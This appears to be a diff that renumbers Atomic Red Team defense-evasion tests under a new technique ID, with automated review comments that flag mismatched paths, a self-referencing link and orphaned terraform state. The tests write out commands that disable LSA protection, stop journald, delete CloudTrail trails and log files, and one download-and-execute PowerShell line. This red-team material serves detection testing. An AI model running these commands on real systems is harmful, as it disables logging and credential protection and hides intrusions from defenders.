- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
### Atomic Test #1: Windows Disable LSA Protection
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
**Supported Platforms:** Windows
**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
```
### Atomic Test #2: Disable journal logging via systemctl utility
The atomic test disables the journal logging using built-in systemctl utility
**Supported Platforms:** Linux
**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo systemctl stop systemd-journald #disables journal logging
```
#### Cleanup Commands
```sh
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
```
### Atomic Test #3: Disable journal logging via sed utility
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
**Supported Platforms:** Linux
**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
```
#### Cleanup Commands
```sh
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
```
-50
@@ -1,50 +0,0 @@
attack_technique: T1562
display_name: 'Impair Defenses'
atomic_tests:
- name: Windows Disable LSA Protection
auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
description: |
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
supported_platforms:
- windows
executor:
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable journal logging via systemctl utility
auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
description: |
The atomic test disables the journal logging using built-in systemctl utility
supported_platforms:
- linux
executor:
command: |
sudo systemctl stop systemd-journald #disables journal logging
cleanup_command: |
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
name: sh
elevation_required: true
- name: Disable journal logging via sed utility
auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
description: |
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
supported_platforms:
- linux
executor:
command: |
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
cleanup_command: |
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
name: sh
elevation_required: true
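Review bot: the YAML side of the move is not visible: the three tests deleted here (auto_generated_guid 40075d5f-3a70-4c66-9125-f72bee87247d, c3a377f9-1203-4454-aa35-9d391d34768f and 12e5551c-8d5c-408e-b3e4-63f53b03379f) are re-listed as Atomic Tests #1 to #3 in T1685.md at the end of this diff, but no addition of those guids to the T1685 YAML is shown. Since the markdown is generated from the YAML, confirm the YAML entries were added with the same guids (not regenerated ones) so that the two files do not drift and existing references to the guids keep working.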
@@ -1,4 +1,4 @@
# T1562.002 - Impair Defenses: Disable Windows Event Logging
# T1685.001 - Disable or Modify Tools: Disable or Modify Windows Event Log
## Description from ATT&CK
@@ -10,11 +10,11 @@
>
> There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)
>
> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)
> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1685.001_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1685.001_redcanaryco)
>
> By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
[Source](https://attack.mitre.org/techniques/T1562/002)
[Source](https://attack.mitre.org/techniques/T1685/001)
## Atomic Tests
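Review bot: the citation keys inside the quoted ATT&CK description were renamed by search-and-replace (`(Citation: T1562.002_redcanaryco)` became `(Citation: T1685.001_redcanaryco)`), but those keys are reference names in ATT&CK's own source data, not identifiers owned by this repo, so the rename may not match what v19 actually publishes. The "Description from ATT&CK" block should be regenerated from the v19 STIX object for T1685.001 rather than edited by hand, so the quoted text stays verbatim.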
@@ -200,7 +200,7 @@ Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1562.002&#92;bin&#92;Phant0m.exe|
| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1685.001&#92;bin&#92;Phant0m.exe|
#### Attack Commands: Run with `command_prompt`!
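Review bot: the default value now points at `PathToAtomicsFolder\T1685.001\bin\Phant0m.exe`, but no move of `bin/Phant0m.exe` out of the T1562.002 folder is visible in this diff (binary renames are easy to miss in a 35-file change). Without the directory move the `Test-Path "#{file_name}"` prerequisite check fails on every run and the Get Prereq download is forced, so confirm the bin directory is moved in this commit.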
@@ -228,7 +228,7 @@ if (Test-Path "#{file_name}") {exit 0} else {exit 1}
```powershell
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
```
### Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell
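Review bot: the Get Prereq download URL now targets `https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe`, a path on upstream's master branch that only exists once upstream itself adopts the v19 renumbering; until then the prerequisite fetch fails. Either leave the upstream URL at the old `T1562.002` path until upstream moves the file, or point the fetch at a location this fork controls.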
@@ -1,5 +1,5 @@
attack_technique: T1562.002
display_name: 'Impair Defenses: Disable Windows Event Logging'
attack_technique: T1685.001
display_name: 'Disable or Modify Tools: Disable or Modify Windows Event Log'
atomic_tests:
- name: Disable Windows IIS HTTP Logging
auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
@@ -129,7 +129,7 @@ atomic_tests:
file_name:
description: exe version of Phant0m
type: path
default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
default: PathToAtomicsFolder\T1685.001\bin\Phant0m.exe
dependency_executor_name: powershell
dependencies:
- description: |
@@ -138,7 +138,7 @@ atomic_tests:
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
executor:
command: |
"#{file_name}"
@@ -1,4 +1,4 @@
# T1562.008 - Impair Defenses: Disable Cloud Logs
# T1685.002 - Disable or Modify Tools: Disable or Modify Cloud Log
## Description from ATT&CK
@@ -6,7 +6,7 @@
>
> For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the users license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
[Source](https://attack.mitre.org/techniques/T1562/008)
[Source](https://attack.mitre.org/techniques/T1685/002)
## Atomic Tests
@@ -49,7 +49,7 @@ aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
#### Cleanup Commands
```sh
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform destroy -auto-approve
```
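Review bot: `cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"` followed by `terraform destroy` will not see state written by an earlier `terraform apply` under the old `T1562.008/src/T1562.008-1/` directory, so any dependency resources created before this change are left orphaned in AWS (the prerequisite check at the new path will also report them missing and apply them a second time). Add a migration note that users should `terraform destroy` from the old directory before updating, and confirm the `src/` terraform directories are actually renamed in this commit, since no moves are visible here.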
@@ -88,13 +88,13 @@ echo Please install the terraform and configure your aws default profile
###### Check Prereq Commands
```sh
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform init
terraform apply -auto-approve
```
@@ -132,7 +132,7 @@ Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_n
#### Cleanup Commands
```powershell
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform destroy -auto-approve
```
@@ -185,13 +185,13 @@ echo Configure your Azure account using: az login.
###### Check Prereq Commands
```powershell
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
```powershell
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform init
terraform apply -auto-approve
```
@@ -262,7 +262,7 @@ Update event selectors in AWS CloudTrail to disable the logging of certain manag
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
@@ -335,7 +335,7 @@ This Atomic test will use the Stratus Red Team will first setup a CloudTrail log
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
@@ -408,7 +408,7 @@ This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
@@ -1,5 +1,5 @@
attack_technique: T1562.008
display_name: 'Impair Defenses: Disable Cloud Logs'
attack_technique: T1685.002
display_name: 'Disable or Modify Tools: Disable or Modify Cloud Log'
atomic_tests:
- name: AWS - CloudTrail Changes
auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
@@ -36,9 +36,9 @@ atomic_tests:
- description: |
Check if the dependency resources are already present.
prereq_command: |
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform init
terraform apply -auto-approve
executor:
@@ -47,7 +47,7 @@ atomic_tests:
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
cleanup_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform destroy -auto-approve
name: sh
elevation_required: false
@@ -104,9 +104,9 @@ atomic_tests:
- description: |
Create dependency resources using terraform
prereq_command: |
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
get_prereq_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform init
terraform apply -auto-approve
executor:
@@ -118,7 +118,7 @@ atomic_tests:
name: powershell
elevation_required: false
cleanup_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform destroy -auto-approve
- name: Office 365 - Exchange Audit Log Disabled
auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
@@ -173,7 +173,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
@@ -228,7 +228,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
@@ -282,7 +282,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
@@ -1,4 +1,4 @@
# T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
# T1685.004 - Disable or Modify Tools: Disable or Modify Linux Audit System Log
## Description from ATT&CK
@@ -8,7 +8,7 @@
>
> With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
[Source](https://attack.mitre.org/techniques/T1562/012)
[Source](https://attack.mitre.org/techniques/T1685/004)
## Atomic Tests
@@ -1,5 +1,5 @@
attack_technique: T1562.012
display_name: 'Impair Defenses: Disable or Modify Linux Audit System'
attack_technique: T1685.004
display_name: 'Disable or Modify Tools: Disable or Modify Linux Audit System Log'
atomic_tests:
- name: Delete all auditd rules using auditctl
auto_generated_guid: 33a29ab1-cabb-407f-9448-269041bf2856
@@ -1,4 +1,4 @@
# T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
# T1685.005 - Disable or Modify Tools: Clear Windows Event Logs
## Description from ATT&CK
@@ -15,7 +15,7 @@
>
> Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
[Source](https://attack.mitre.org/techniques/T1070/001)
[Source](https://attack.mitre.org/techniques/T1685/005)
## Atomic Tests
@@ -76,7 +76,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
```
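Review bot: the macro path `PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt` requires the src file `T1070.001-macrocode.txt` itself to be renamed, not just its directory; no rename of that file appears in the diff, so check it exists or Invoke-Maldoc will fail to read the macro. The `Invoke-MalDoc.ps1` URL still references T1204.002, which this renumbering does not touch, so that line is fine as left.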
@@ -1,5 +1,5 @@
attack_technique: T1070.001
display_name: 'Indicator Removal on Host: Clear Windows Event Logs'
attack_technique: T1685.005
display_name: 'Disable or Modify Tools: Clear Windows Event Logs'
atomic_tests:
- name: Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
@@ -56,6 +56,6 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
elevation_required: true
@@ -1,4 +1,4 @@
# T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
# T1685.006 - Disable or Modify Tools: Clear Linux or Mac System Logs
## Description from ATT&CK
@@ -12,7 +12,7 @@
> * <code>/var/log/maillog</code>: Mail server logs
> * <code>/var/log/httpd/</code>: Web server access and error logs
[Source](https://attack.mitre.org/techniques/T1070/002)
[Source](https://attack.mitre.org/techniques/T1685/006)
## Atomic Tests
@@ -541,7 +541,7 @@ stat #{journal_folder}
###### Get Prereq Commands
```sh
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
mkdir -p #{journal_folder} && touch #{journal_folder}/T1685.006.journal
```
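Review bot: filename mismatch between the markdown and YAML sides of this change: this hunk writes `#{journal_folder}/T1685.006.journal`, while the YAML hunk later in this diff writes `#{journal_folder}/T1685_006.journal` (the original was `T1070_002.journal`, underscore form). The markdown is generated from the YAML, so pick one spelling (the underscore form matches the original and the prereq `stat` check) and regenerate the markdown instead of hand-editing both.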
### Atomic Test #19: Overwrite Linux Mail Spool
@@ -1,5 +1,5 @@
attack_technique: T1070.002
display_name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
attack_technique: T1685.006
display_name: 'Disable or Modify Tools: Clear Linux or Mac System Logs'
atomic_tests:
- name: rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
@@ -362,7 +362,7 @@ atomic_tests:
prereq_command: |
stat #{journal_folder}
get_prereq_command: |
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
mkdir -p #{journal_folder} && touch #{journal_folder}/T1685_006.journal
executor:
command: |
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
@@ -1,4 +1,4 @@
# T1562.001 - Impair Defenses: Disable or Modify Tools
# T1685 - Disable or Modify Tools
## Description from ATT&CK
@@ -6,7 +6,7 @@
>
> Adversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional. By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)
>
> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tools exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1685), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tools exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
>
> Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
>
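Review bot: the rewritten link in this hunk makes "Indicator Blocking" point at https://attack.mitre.org/techniques/T1685, which is this page's own technique, so a cross-reference has become a self-reference; the original target was the distinct sub-technique T1562/006, and the bulk T1562-to-T1685 replacement should not have touched it. Regenerate the quoted "Description from ATT&CK" block from the v19 STIX for T1685 rather than search-replacing technique IDs inside ATT&CK's text, which also avoids the same problem for any other embedded technique links.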
@@ -18,71 +18,154 @@
>
> Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
[Source](https://attack.mitre.org/techniques/T1562/001)
[Source](https://attack.mitre.org/techniques/T1685)
## Atomic Tests
- [Atomic Test #1: Disable syslog](#atomic-test-1-disable-syslog)
- [Atomic Test #2: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
- [Atomic Test #3: Disable Cb Response](#atomic-test-3-disable-cb-response)
- [Atomic Test #4: Disable SELinux](#atomic-test-4-disable-selinux)
- [Atomic Test #5: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
- [Atomic Test #6: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
- [Atomic Test #7: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
- [Atomic Test #8: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
- [Atomic Test #9: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
- [Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
- [Atomic Test #11: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
- [Atomic Test #12: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
- [Atomic Test #13: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
- [Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
- [Atomic Test #15: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
- [Atomic Test #16: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
- [Atomic Test #17: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
- [Atomic Test #18: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
- [Atomic Test #19: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
- [Atomic Test #20: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
- [Atomic Test #21: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
- [Atomic Test #22: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
- [Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
- [Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
- [Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
- [Atomic Test #26: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
- [Atomic Test #27: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
- [Atomic Test #28: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
- [Atomic Test #29: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
- [Atomic Test #30: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
- [Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
- [Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
